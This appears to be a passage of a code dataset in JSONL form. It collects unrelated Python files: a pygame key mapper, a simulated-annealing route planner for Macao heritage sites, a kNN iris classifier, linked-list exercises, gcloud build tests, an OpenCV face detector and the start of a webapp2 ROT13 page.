tileFloorPrim = stage.GetPrimAtPath(FRIDGE_PATH)\n treeIter = iter(Usd.PrimRange.AllPrims(tileFloorPrim))\n for prim in treeIter:\n gprim = UsdGeom.Gprim.Get(stage, prim.GetPath())\n UsdShade.MaterialBindingAPI(gprim).Bind(material)\n\n # Export Stage\n stage.Export(EXPORT_NAME)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"material_tests/kitchen_material_test.py","file_name":"kitchen_material_test.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"650830387","text":"# Main calls this class to get the key mapping, up down left right, for the game that is being played\n# This could be called in the initialization of a player, and have the keys as attributes of the object\n# i.e. player.up, player.down, player.right, player.left = getUp()\n# would give the player the keys necessary for moving around.\n#\n\nimport pygame, random\nfrom pygame.locals import *\n\n\n\narrowkeys = [K_UP, K_DOWN, K_LEFT, K_RIGHT]\nallalphabetkeys = [K_a, K_b, K_c, K_d, K_e, K_f, K_g, K_h, K_i, K_j, K_k, K_l, K_m, K_n, K_o, K_p,K_q, K_r, K_s, K_t, K_u,\n K_v, K_w, K_x, K_y, K_z]\nnumberkeys = [K_0, K_1, K_2, K_3, K_4, K_5, K_6, K_7, K_8, K_9]\n\n\ndef getKeys(difficulty):\n\n\n if difficulty == 0:\n up = K_UP\n down = K_DOWN\n left = K_LEFT\n right = K_RIGHT\n\n if difficulty == 1:\n random.shuffle(arrowkeys)\n up = arrowkeys[0]\n down = arrowkeys[1]\n left = arrowkeys[2]\n right = arrowkeys[3]\n\n if difficulty == 2:\n up = K_w\n down = K_s\n left = K_a\n right = K_d\n\n if difficulty == 10:\n random.shuffle(allalphabetkeys)\n up = allalphabetkeys[0]\n down = allalphabetkeys[1]\n left = allalphabetkeys[2]\n right = allalphabetkeys[3]\n\n return up, down, left, right #this is mapped out North south east west","sub_path":"Alpha_Release/key_mapping.py","file_name":"key_mapping.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"494041862","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on \n@author: weishan_lee\n\nSight-seeing order of Macao World Heritage Sites\nCase 2: Travel distance or time for pairs of cities recorded in the following csv files: \n (1) carTime.csv records time required for driving a car.\n (2) busTime.csv records time required for taking a bus.\n (3) pedestrianTime.csv records time required by walking between a pair of cities.\n (4) carDistance.csv records distance between a pair of sites by car.\n (5) pedestrianDistance.csv records distance between a pair of sites by foot.\n The optimal route is found based on the Simulated Annealing and Metropolis Algorithm. \nVersion 3_2: 1. Write to log.txt automatically.\n 2. Add funcion definition plotRoute\n 3. Modify function distance\n\"\"\"\nfrom math import exp\nimport numpy as np\nimport random as rand\nfrom vpython import * \nimport pandas as pd\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import AutoMinorLocator\nfrom sklearn import preprocessing\nmin_max_scaler = preprocessing.MinMaxScaler()\nimport sys\nimport os.path\n\n## Function Definitions\n\n# Function to calculate the updated total distance or time of the tour\ndef distanceUpdate(i, j, oldScore, randomList, rCoor):\n s = oldScore\n lList = len(randomList)\n\n if abs(i-j)==1:\n if ij\n if j == 0: \n jF = randomList[-1]\n else:\n jF = randomList[j-1]\n \n jC = randomList[j]\n jN = randomList[j+1]\n \n iF = randomList[i-1]\n iC = randomList[i]\n if i == lList-1: \n iN = randomList[0]\n else:\n iN = randomList[i+1] \n \n if jC!=iF or jN!=iC: print(\"WRONG! jC!=iF or jN!=iC! LINE 78\")\n s = s - rCoor[jF,jC] - rCoor[jC,jN] - rCoor[iC,iN]\n s = s + rCoor[jF,iC] + rCoor[iC,jC] + rCoor[jC,iN]\n else:\n \n if i == 0: \n iF = randomList[-1]\n else:\n iF = randomList[i-1]\n \n iC = randomList[i]\n \n if i == lList-1: \n iN = randomList[0]\n else:\n iN = randomList[i+1]\n \n if j == 0: \n jF = randomList[-1]\n else:\n jF = randomList[j-1]\n \n jC = randomList[j]\n if j == lList-1: \n jN = randomList[0]\n else:\n jN = randomList[j+1]\n \n s = s - rCoor[iF,iC] - rCoor[iC,iN] - rCoor[jF,jC] - rCoor[jC,jN]\n s = s + rCoor[iF,jC] + rCoor[jC,iN] + rCoor[jF,iC] + rCoor[iC,jN] \n return s\n\n# Function to calculate the initial total distance or time of the tour\ndef distance(randomList, rCoor):\n s = 0.0\n for i in range(N):\n j = randomList[i-1]\n k = randomList[i]\n s += rCoor[j,k]\n return s\n\n# output of the score (distance vs time steps)\ndef outPutScrVSTime(tRecord, scoreRecord):\n data = {'timeStep': tRecord,'score':scoreRecord}\n dfCSV = pd.DataFrame(data)\n dfCSV_file = open('./scoreVSTime.csv','w',newline='') \n dfCSV.to_csv(dfCSV_file, sep=',', encoding='utf-8',index=False)\n dfCSV_file.close()\n \ndef outPutSitesOrder(randomList):\n ## Write randomList back to cities datafram\n \n sites[\"sitesOrder\"] = randomList\n \n sitesOrder = pd.DataFrame(columns = ['sitesId', 'Name'])\n sitesOrder_file = open(\"./sightSeeingOrder.csv\",'w',newline='') \n\n for i in range(N+1):\n if i == N:\n integer = np.uint32(sites.loc[0].sitesOrder)\n sitesOrder.loc[i] = integer, sites.loc[integer].Name\n else:\n integer = np.uint32(sites.loc[i].sitesOrder)\n sitesOrder.loc[i] = integer, sites.loc[integer].Name\n\n sitesOrder.to_csv(sitesOrder_file, sep=',', encoding='utf-8', index=False) \n sitesOrder_file.close()\n\ndef plotRoute(rr, sites):\n x = []\n y = []\n n = [int(num) for num in rCoor[:,3].tolist()]\n\n for i in range(N+1):\n if i == N:\n x.append( sites.loc[n[0]].X )\n y.append( sites.loc[n[0]].Y )\n else:\n x.append( sites.loc[n[i]].X )\n y.append( sites.loc[n[i]].Y )\n fig, ax = plt.subplots()\n ax.title.set_text(\"Optimal Tour Path\")\n\n ax.plot(x,y,'k-')\n ax.scatter(x[0],y[0],c='blue')\n ax.scatter(x[1:-1],y[1:-1],c='red')\n\n for i, txt in enumerate(n):\n ax.annotate(txt, (x[i], y[i]))\n\n ax.set_xlabel(\"Longitude\",size = 12)\n ax.set_ylabel(\"Latitude\",size = 12)\n ax.ticklabel_format(useOffset=False)\n plt.grid(True)\n plt.savefig(\"optimalTourPath.eps\") \n \ndef writeLog(msg):\n with open('log.txt', 'a+') as the_file:\n print(msg)\n the_file.write(msg)\n\nimport os, psutil\n# If previous log.txt file exists, remove it.\nif os.path.exists(\"./log.txt\"):\n os.remove(\"./log.txt\")\n \ndef cpu_stats():\n pid = os.getpid()\n py = psutil.Process(pid)\n memory_use = py.memory_info()[0] / 2. ** 30\n return 'Memory: ' + str(np.round(memory_use, 2)) + 'GB\\t'\n\n########################## Parameters and Options ############################\n## If you need animation?\nanimation = False\n## If you need to record score vs time step?\nscoreVsTime = False\n\n## Set up Case and load matrix of time or distance for each pair of cities.\n# case = 1: car Time. \n# case = 2: bus time. Some pair of route may be replaced by pedestrian time.\n# case = 3: pedestrin time.\n# case = 4: car distance.\n# cas3 = 5: pedestrian distance.\ncase = 4\n\n## Parameters for Simulated annealing\nTmax = 1.0\nTmin = 1e-2\ntau = 1e3\ntargetScore = 13.916 # carTime 78. busTime = 117. pedestrianTime = 115.\n # carDistance 13.916. pedestrianDistance = 7.844\n###############################################################################\n\n# Load world heritage sites locations\nsites = pd.read_csv(\"./macauWHSLoc.csv\")\nR = 0.02\nN = sites.shape[0]\n\n## normalize data\n\nsites['normX'] = min_max_scaler.fit_transform(sites.X.values.reshape(-1, 1))\nsites['normY'] = min_max_scaler.fit_transform(sites.Y.values.reshape(-1, 1))\n\nif case == 1:\n matrix_ = pd.read_csv(\"./carTime.csv\")\nelif case == 2:\n matrix_ = pd.read_csv(\"./busTime.csv\")\nelif case == 3:\n matrix_ = pd.read_csv(\"./pedestrianTime.csv\")\nelif case == 4:\n matrix_ = pd.read_csv(\"./carDistance.csv\")\nelse:\n matrix_ = pd.read_csv(\"./pedestrianDistance.csv\")\n\nN = 25 # number of sites\n\n# Set up the initial configuration\nrandomList = rand.sample(range(0, N), N)\n\n## Change sites dataframe to rCoor array \n# rCoor could mean the time or distance of a pair of cities.\n\nrCoor = np.empty([N,N])\nfor i in range(N):\n for j in range(N):\n rCoor[i,j] = matrix_.iloc[i][j] # matrix value\n\n## Change sites dataframe to rPlot array\nrPlot = np.empty([N+1,4])\nfor i in range(N):\n j = randomList[i]\n rPlot[i,0] = sites.normX[j]\n rPlot[i,1] = sites.normY[j]\n rPlot[i,2] = 0.0\n rPlot[i,3] = sites.SiteId[j]\n \n# Add one more ending site which is identical the starting site\nrPlot[N,0] = rPlot[0,0]\nrPlot[N,1] = rPlot[0,1]\nrPlot[N,2] = rPlot[0,2]\nrPlot[N,3] = rPlot[0,3]\n\n#Calculate the initial distance\n\nscore = distance(randomList, rCoor)\ninitScore = score\nminScore = initScore\nmsg = \"Initial score = {:.5f}\\n\".format(initScore)\n\noldScore = score\n\n# Write the log.txt file for the first time.\nwriteLog(msg)\n\n# Set up the graphics\nif animation == True:\n scene = canvas(center=vector(0.5,0.5,0.0), background = color.white)\n for i in range(N):\n if i == 0:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.blue)\n else:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.black)\n l = curve(pos=rPlot.tolist(),radius=R/4,color = color.red)\n\n## Simulated annealing\n## Main loop\n\ntRecord = []\nscoreRecord = []\n\nt0=0 # setting up the beginning of the time \"lump\"\ntRecord += [0]\nscoreRecord += [score]\n\nfirstInitial = True\n\nwhile (score>targetScore):\n \n if firstInitial == False: \n # Set up another initial configuration\n randomList = rand.sample(range(0, N), N)\n\n ## Change sites dataframe to rCoor array\n rCoor = np.empty([N,N])\n for i in range(N):\n for j in range(N):\n rCoor[i,j] = matrix_.iloc[i][j] \n \n #Calculate the initial distance\n score = distance(randomList, rCoor)\n\n ## Change sites dataframe to rPlot array\n rPlot = np.empty([N+1,4])\n for i in range(N):\n j = randomList[i]\n rPlot[i,0] = sites.normX[j]\n rPlot[i,1] = sites.normY[j]\n rPlot[i,2] = 0.0\n rPlot[i,3] = sites.SiteId[j]\n \n # Add one more ending site which is identical the starting site\n rPlot[N,0] = rPlot[0,0]\n rPlot[N,1] = rPlot[0,1]\n rPlot[N,2] = rPlot[0,2]\n rPlot[N,3] = rPlot[0,3]\n \n if animation == True:\n # Set up the graphics\n scene.delete()\n scene = canvas(center=vector(0.5,0.5,0.0), background = color.white)\n for i in range(N):\n if i == 0:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.blue)\n else:\n sphere(pos=vector(rPlot[i,0],rPlot[i,1],0.0),radius=R,color = color.black)\n l = curve(pos=rPlot.tolist(),radius=R/4,color = color.red)\n\n T = Tmax\n t = 0\n while (T>Tmin):\n # Cooling\n t += 1\n T = Tmax*exp(-t/tau)\n\n # Choose two sites to swap and make sure they are distinct\n i,j = rand.randrange(1,N),rand.randrange(1,N)\n while i==j:\n i,j = rand.randrange(1,N),rand.randrange(1,N)\n \n # Swap them and calculate the change in score\n oldScore = score\n \n rPlot[i,0],rPlot[j,0] = rPlot[j,0],rPlot[i,0]\n rPlot[i,1],rPlot[j,1] = rPlot[j,1],rPlot[i,1]\n rPlot[i,2],rPlot[j,2] = rPlot[j,2],rPlot[i,2]\n rPlot[i,3],rPlot[j,3] = rPlot[j,3],rPlot[i,3]\n \n score = distanceUpdate(i,j,oldScore,randomList,rCoor)\n \n randomList[i], randomList[j] = randomList[j], randomList[i]\n scoreCheck = distance(randomList, rCoor)\n if abs(score-scoreCheck)>1e-4:\n randomList[i], randomList[j] = randomList[j], randomList[i]\n msg = \"Score Error! Line 359.\\n\" +\\\n \"i = {}, j = {}, randomList[i] = {}, randomList[j] = {}\\n\".format(i,j,randomList[i],randomList[j]) +\\\n \"score = {}, scoreCheck = {}\".format(score,scoreCheck)\n writeLog(msg)\n sys.exit()\n \n deltaScore = score - oldScore\n\n try:\n ans = np.exp(-deltaScore/T)\n except OverflowError:\n if -deltaScore/T > 0:\n ans = float('inf')\n else:\n ans = 0.0\n \n # If the move is rejected, swap them back again\n if rand.random() > ans:\n \n randomList[i], randomList[j] = randomList[j], randomList[i]\n \n rPlot[i,0],rPlot[j,0] = rPlot[j,0],rPlot[i,0]\n rPlot[i,1],rPlot[j,1] = rPlot[j,1],rPlot[i,1]\n rPlot[i,2],rPlot[j,2] = rPlot[j,2],rPlot[i,2]\n rPlot[i,3],rPlot[j,3] = rPlot[j,3],rPlot[i,3]\n score = oldScore\n if np.abs(score - distance(randomList, rCoor))>1e-5:\n msg = \"score: {}\".format(score)\n writeLog(msg)\n msg = \"distance: {}\".format(distance(randomList, rCoor))\n writeLog(msg)\n msg = \"Error Line 390\"\n writeLog(msg)\n sys.exit()\n \n if animation == True: \n # Update the visualization every 100 moves\n if t%100==0:\n rate(25)\n for i in range(N+1):\n pos = vector(rPlot[i,0],rPlot[i,1],0.0)\n l.modify(i,pos)\n \n if scoreVsTime == True:\n #if t%1==0:\n tRecord += [t0+t]\n scoreRecord += [score]\n \n #writeLog(cpu_stats())\n \n if score < minScore: \n minScore = score\n outPutScrVSTime(tRecord, scoreRecord)\n outPutSitesOrder(randomList)\n dt = datetime.now()\n msg = str(dt.year) + '/' + str(dt.month) + '/' + str(dt.day) + ' ' +\\\n str(dt.hour) + ':' + str(dt.minute) + ':' + str(dt.second) +'\\t'\n writeLog(msg)\n msg = \"Delta score = {:.5f}\\t\".format(deltaScore)\n writeLog(msg)\n msg = \"New score = {:.5f}\\n\".format(score)\n writeLog(msg) \n \n t0 = t0 + t # go to next time \"lump\"\n firstInitial = False\n# End of Main Loop\nif case == 1 or case == 2 or case == 3:\n msg = \"The initial total traveling time = {:.5f} min\\n\".format(initScore)\n writeLog(msg)\n msg = \"The optimal total traveling time = {:.5f} min\\n\".format(score)\n writeLog(msg)\nelse:\n msg = \"The initial total traveling distance = {:.5f} km\\n\".format(initScore)\n writeLog(msg)\n msg = \"The optimal total traveling distance = {:.5f} km\\n\".format(score)\n writeLog(msg)\n\n# plot score vs t\nplt.figure()\nplt.title(\"traveling time vs Iteration\")\nax = plt.gca()\nenVsTime = pd.read_csv( \"./scoreVSTime.csv\") \nplt.plot(enVsTime.timeStep,enVsTime.score,'k-')\nplt.minorticks_on()\nminorLocatorX = AutoMinorLocator(5) # number of minor intervals per major # inteval\nminorLocatorY = AutoMinorLocator(5)\nax.set_xlabel(\"Iteration\",size = 16)\nif case == 1 or case == 2 or case == 3:\n ax.set_ylabel(\"Total traveling time (min)\",size = 16)\nelse:\n ax.set_ylabel(\"Total traveling distance (km)\",size = 16)\nax.xaxis.set_minor_locator(minorLocatorX) # add minor ticks on x axis\nax.yaxis.set_minor_locator(minorLocatorY) # add minor ticks on y axis\nplt.grid(True)\n#plt.xlim(-20000,500000)\nplt.savefig(\"scoreVsTime.eps\")\nplt.show() \n\nscoreCheck = distance(randomList, rCoor)\nif case == 1 or case == 2 or case == 3:\n msg = \"The checked optimal total traveling time = {:.5f} min\".format(scoreCheck)\n writeLog(msg)\nelse:\n msg = \"The checked optimal total traveling distance = {:.5f} km\".format(scoreCheck)\n writeLog(msg)","sub_path":"SAMAV3_2.py","file_name":"SAMAV3_2.py","file_ext":"py","file_size_in_byte":14926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"366969403","text":"from sklearn.datasets import load_iris\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom matplotlib import pyplot as plt\nfrom argparse import ArgumentParser\nimport numpy as np\nimport math\niris = load_iris()\n\nparser = ArgumentParser()\nparser.add_argument(\"-k\", type=int, action=\"store\", dest=\"k_value\")\nparser.add_argument(\"--print-guesses\", action=\"store_true\", dest=\"print_guesses\")\nparser.add_argument('kvals', metavar='N', type=int, nargs='+')\nargs = parser.parse_args()\n\nx_iris, y_iris = iris.data, iris.target\nx_names, y_names = iris.feature_names, iris.target_names\n\nnormalizador = StandardScaler().fit(x_iris)\nXn_iris = normalizador.transform(x_iris)\n\nx_train, x_test, y_train, y_test = train_test_split(x_iris, y_iris, test_size = 0.25)\n\ndef l2_dist(p, q):\n squares_sum = 0.0\n n = len(p)\n if n != len(q):\n raise ValueError(\"Oh noes!\")\n for i in (i for i in range(n)):\n squares_sum += (p[i] - q[i])**2\n return math.sqrt(squares_sum)\n\ndef f(D, x, k):\n dist = []\n labels = []\n i = 0\n for val in D:\n dist.append((l2_dist(val, x), i))\n i += 1\n dist.sort(key = lambda t: t[0])\n\n for i in range(k):\n labels.append(y_train[dist[i][1]])\n return max(labels, key=labels.count), (labels.count(max(labels, key=labels.count))/k)*100, \n\nfor k_value in args.kvals:\n percentages = []\n for i in range(10):\n if(args.print_guesses):\n print(\"%-15s%-15s%-15s\"%(\"Etiqueta\", \"Correcta\", \"Certeza\"))\n correct_labelling_count = 0\n for i in range(len(x_test)):\n l, p = f(x_train, x_test[i], k_value)\n correct_label = y_test[i]\n if(args.print_guesses):\n print(\"%-15i%-15i%-15.2f\"%(l, correct_label, p))\n if l == correct_label:\n correct_labelling_count += 1\n percentages.append(correct_labelling_count/len(x_test))\n percentages = np.array(percentages, dtype=float)\n\n print(\"K = %i\"%(k_value))\n print(\"Media = %.2f%%\"%(percentages.mean()*100))\n print(\"Desv. Est. = %.2f\"%(percentages.std()))","sub_path":"Patrones/Clase10/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"336038700","text":"import csv\nimport json\nfrom datetime import datetime\n\ndef ToCSV_separately(Province_list):\n path_peifix = 'D:\\MyGit\\Real-time-dynamic-query-of-pneumonia\\Data Record Separately\\\\'\n for province in Province_list:\n file_path = path_peifix+province.provinceShortName+'.csv'\n csv_file = open(file_path, 'a+', newline='')\n title = ['sort','确诊','疑似','治愈','死亡','修改时间']\n writer = csv.writer(csv_file)\n writer.writerow(title)\n \n modify_time = datetime.fromtimestamp(province.modifyTime/1000)\n time_str = datetime.strftime(modify_time,'%Y-%m-%d %H:%M:%S')\n writer.writerow([province.sort,province.num_confirmed,province.num_suspected,province.num_cured,province.num_dead,time_str])\n csv_file.close()\n\ndef DicToCSV(dic_data,file_name):\n path = 'D:\\MyGit\\Real-time-dynamic-query-of-pneumonia\\Data Record csv\\\\' + file_name\n csv_file = open(path, 'w+', newline='')\n keys = []\n writer = csv.writer(csv_file)\n for dic in dic_data:\n keys = dic.keys()\n # 写入列名\n writer.writerow(keys)\n break\n\n for dic in dic_data:\n for key in keys:\n if key not in dic:\n dic[key] = ''\n writer.writerow(dic.values())\n csv_file.close()","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"648607667","text":"# coding: utf8\nimport pytest\nfrom app.views import answers as an\nfrom app.views import templates as t\nfrom tests.helpers.fake_i18n import I18N\nfrom tests.helpers.fake_base_message import FakeMessage\nfrom app.views.helpers import Types\n\n\n@pytest.mark.unit\n@pytest.mark.views\n@pytest.mark.answers\ndef test__inside_get(state, monkeypatch):\n monkeypatch.setattr(an, \"I18N\", I18N)\n monkeypatch.setattr(t, \"SystemException\", FakeMessage)\n an.SystemException._get(state)\n\n\n@pytest.mark.unit\n@pytest.mark.views\n@pytest.mark.answers\ndef test__get(state, data, monkeypatch):\n monkeypatch.setattr(an, \"I18N\", I18N)\n monkeypatch.setattr(t, \"SystemException\", FakeMessage)\n answer = an.SystemException.get(state)\n\n assert answer[\"chat_id\"] == data[\"id\"]\n assert answer[\"message_type\"] == Types.TEXT_MESSAGE\n assert isinstance(answer[\"text\"], str)\n","sub_path":"tests/units/answers/test__system_exception.py","file_name":"test__system_exception.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"550086201","text":"# -*- coding: utf-8 -*- #\n# Copyright 2020 Google LLC. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests that exercise build creation.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.calliope import base as calliope_base\nfrom tests.lib import test_case\nfrom tests.lib.surface.compute.builds import submit_test_base as test_base\n\n\nclass MachineTypeTest(test_base.SubmitTestBase):\n\n def PreSetUp(self):\n self.track = calliope_base.ReleaseTrack.GA\n\n def testCreateMachineTypeSuccess(self):\n b_out = self.cloudbuild_v1_messages.Build(\n createTime='2016-03-31T19:12:32.838111Z',\n id='123-456-789',\n images=[\n 'gcr.io/my-project/image',\n ],\n projectId='my-project',\n status=self._statuses.QUEUED,\n logsBucket='gs://my-project_cloudbuild/logs',\n source=self.cloudbuild_v1_messages.Source(\n storageSource=self.cloudbuild_v1_messages.StorageSource(\n bucket='my-project_cloudbuild',\n object=self.frozen_zip_filename,\n generation=123,\n )),\n steps=test_base.DOCKER_BUILD_STEPS,\n logUrl='mockLogURL',\n timeout='600.000s',\n options=self.cloudbuild_v1_messages.BuildOptions(\n machineType=self._vmtypes.N1_HIGHCPU_8),\n )\n b_in = self.cloudbuild_v1_messages.Build(\n images=[\n 'gcr.io/my-project/image',\n ],\n source=self.cloudbuild_v1_messages.Source(\n storageSource=self.cloudbuild_v1_messages.StorageSource(\n bucket='my-project_cloudbuild',\n object=self.frozen_zip_filename,\n generation=123,\n )),\n steps=test_base.DOCKER_BUILD_STEPS,\n options=self.cloudbuild_v1_messages.BuildOptions(\n machineType=self._vmtypes.N1_HIGHCPU_8),\n )\n self.ExpectMessagesForSimpleBuild(b_in, b_out)\n\n self._Run([\n 'builds', 'submit', 'gs://bucket/object.zip',\n '--tag=gcr.io/my-project/image', '--machine-type=n1-highcpu-8',\n '--async'\n ])\n self.AssertErrContains(\n \"\"\"\\\nCreated [https://cloudbuild.googleapis.com/v1/projects/my-project/builds/123-456-789].\n\"\"\",\n normalize_space=True)\n self.AssertOutputContains(\n \"\"\"\\\nID CREATE_TIME DURATION SOURCE IMAGES STATUS\n123-456-789 2016-03-31T19:12:32+00:00 - gs://my-project_cloudbuild/{frozen_zip_filename} - QUEUED\n\"\"\".format(frozen_zip_filename=self.frozen_zip_filename),\n normalize_space=True)\n\n def testCreateWrongMachineType(self):\n with self.assertRaises(Exception):\n self._Run([\n 'builds', 'submit', '--tag=gcr.io/my-project/image',\n '--machine-type=n1-wrong-1', '--no-source'\n ])\n\n def testCreateUnspecifiedMachineType(self):\n with self.assertRaises(Exception):\n self._Run([\n 'builds', 'submit', '--tag=gcr.io/my-project/image',\n '--machine-type=unspecified', '--no-source'\n ])\n\n\nclass MachineTypeTestBeta(MachineTypeTest):\n\n def PreSetUp(self):\n self.track = calliope_base.ReleaseTrack.BETA\n\n\nclass MachineTypeTestAlpha(MachineTypeTestBeta):\n\n def PreSetUp(self):\n self.track = calliope_base.ReleaseTrack.ALPHA\n\n\nif __name__ == '__main__':\n test_case.main()\n","sub_path":"google-cloud-sdk/lib/tests/unit/surface/builds/submit_tests/machine_type_test.py","file_name":"machine_type_test.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"505880080","text":"#!/usr/bin/env python\n\nimport cv2\nimport numpy as np\n\n\n# Template Matching Class\nclass Template:\n\n\t# Set up the template contour for later use\n\tdef __init__(self):\n\t\tself.__template_image__ = cv2.imread(\"template.png\")\n\t\tself.__template_image__ = cv2.cvtColor(self.__template_image__, cv2.COLOR_BGR2HSV)\n\t\tself.__template_image__ = cv2.inRange(self.__template_image__, np.array([0, 0, 2]), np.array([255, 255, 255]))\n\t\t_, contours, h = cv2.findContours(self.__template_image__, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\t\tareas = [cv2.contourArea(c) for c in contours]\n\t\tmx_indx = np.argmax(areas)\n\t\tself.__template_contour__ = contours[mx_indx]\n\n\t# Compare the list of contours to the template and sort by the closest matching contours.\n\t# Returns a 2d array, first column contains a number representing the match, smaller the number,\n\t# the closer the contour is to the template, second column represents the array index in the\n\t# originally passed list\n\tdef list_of_matched(self, contours):\n\t\tlist_of_matches = []\n\t\tindex = 0\n\t\tfor c in contours:\n\t\t\tlist_of_matches.append([cv2.matchShapes(self.__template_contour__, c, 1, 0.0), index])\n\t\t\tindex += 1\n\t\tlist_of_matches = sorted(list_of_matches, key=lambda x: x[0])\n\t\treturn list_of_matches\n\n\t# Get the index of the best matched contour in passed list of contours\n\tdef best_match(self, contours):\n\t\treturn self.list_of_matched(contours)[0][1]\n\n\t# For debugging, Just to see what the template looks like\n\tdef get_image_to_show(self):\n\t\treturn self.__template_image__\n\n","sub_path":"Template.py","file_name":"Template.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"261261821","text":"import cv2\n#openCV module\n\n\nface_cascade = cv2.CascadeClassifier('for_face.xml')\ncap = cv2.VideoCapture('v.mp4')\n# use 0 (inbuilt webcam) -1 (for external webcam) instead of v.mp4 to get results from webcam\n\n\nwhile True:\n _, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n \n faces = face_cascade.detectMultiScale(gray, 1.9, 6)\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 1)\n\n\n cv2.imshow('img', img)\n k = cv2.waitKey(2) & 0xff\n if k==27:\n break\n \ncap.release()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"228289029","text":"class Node:\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n\n#Nodes and list WITH encapsulating class\nclass LinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n self.size = 0\n\n def push_front(self, value):\n self.size += 1\n\n new_node = Node(value, self.head)\n self.head = new_node\n\n if self.tail == None:\n self.tail = self.head\n\n def push_back(self, value):\n self.size += 1\n\n if self.tail == None:\n self.push_front(value)\n else:\n self.tail.next = Node(value, None)\n self.tail = self.tail.next\n \n def pop_front(self):\n if self.head == None:\n return None\n\n self.size -= 1\n ret_val = self.head.data\n self.head = self.head.next\n \n if self.head == None:\n self.tail = self.head\n\n return ret_val\n \n def pop_back(self):\n current_node = self.head\n if self.tail == None:\n return None\n elif self.size == 1:\n self.tail = None\n self.head = self.tail\n else:\n while current_node.next != None:\n former_node = current_node\n current_node = current_node.next\n \n former_node.next = None\n\n self.size -= 1\n\n return current_node.data\n \n def get_size(self):\n return self.size\n \n def __str__(self):\n curr_node = self.head\n ret_str = \"\"\n\n while curr_node != None:\n ret_str += str(curr_node.data) + \" \"\n curr_node = curr_node.next\n \n return ret_str\n \nclass Stack:\n def __init__(self):\n self.container = LinkedList()\n\n def push(self, value):\n self.container.push_back(value)\n\n def pop(self):\n self.container.pop_back()\n\nclass Queue:\n def __init__(self):\n self.container = LinkedList()\n\n def add(self, value):\n self.container.push_back(value)\n\n def remove(self):\n self.container.pop_front()\n\nlis = LinkedList()\n\nlis.push_front(3)\nlis.push_front(2)\nlis.push_front(1)\n\nprint(lis)\n\nlis.push_back(4)\nlis.push_back(5)\n\nprint(lis)\n\nlis.pop_front()\nlis.pop_front()\nlis.pop_front()\n\nprint(lis)\n\nprint(lis.pop_back())\n\nprint(lis)\n\n\"\"\"\ndef print_list(head_element):\n while head_element != None:\n print(head_element.data, end=\" \")\n head_element = head_element.next\n print(\"\")\n\ndef push_front(head_element, value):\n #new_head = Node(value, head_element)\n #head_element = new_head\n\n new_head = Node()\n new_head.data = value\n new_head.next = head_element\n\n return new_head\n\ndef remove_front(head_element):\n if head_element == None:\n print(\"Cant remove from empty list!\")\n pass\n else:\n new_head = head_element.next\n head_element = None\n\n return new_head\n\ndef push_back(head_element, value):\n if head_element == None:\n head_element = value\n else: \n while head_element.next != None:\n head_element = head_element.next\n \n head_element.next = value\n\n\nhead = None\nprint_list(head)\n\nhead = push_front(head, 0)\nhead = push_front(head, 1)\nhead = push_front(head, 2)\nhead = push_front(head, 3)\n\nprint_list(head)\n\nhead = remove_front(head)\n\nprint_list(head)\n\npush_back(head, 6)\n\nprint_list(head)\n\"\"\"\n\n\n\n","sub_path":"nodes_and_linkedlists.py","file_name":"nodes_and_linkedlists.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"244437895","text":"# Copyright 2016 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport webapp2\nimport cgi\n\nform=\"\"\"\n\n\n \n Unit 2 ROT13\n 